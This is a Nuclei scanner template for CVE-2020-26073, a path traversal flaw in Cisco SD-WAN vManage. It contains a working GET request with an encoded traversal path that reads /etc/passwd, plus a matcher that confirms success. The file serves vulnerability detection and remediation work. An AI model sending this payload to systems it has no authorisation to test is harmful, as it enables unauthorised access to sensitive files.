nuclei-templates/http/cves/2020/CVE-2020-26073.yaml

35 lines
1.0 KiB
YAML

id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software - Local File Inclusion
author: madrobot
severity: high
description: |
Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
remediation: |
Apply the latest security patches provided by Cisco to fix the vulnerability.
reference:
- https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
classification:
cve-id: CVE-2020-26073
metadata:
max-request: 1
tags: cve,cve2020,cisco,lfi
http:
- method: GET
path:
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body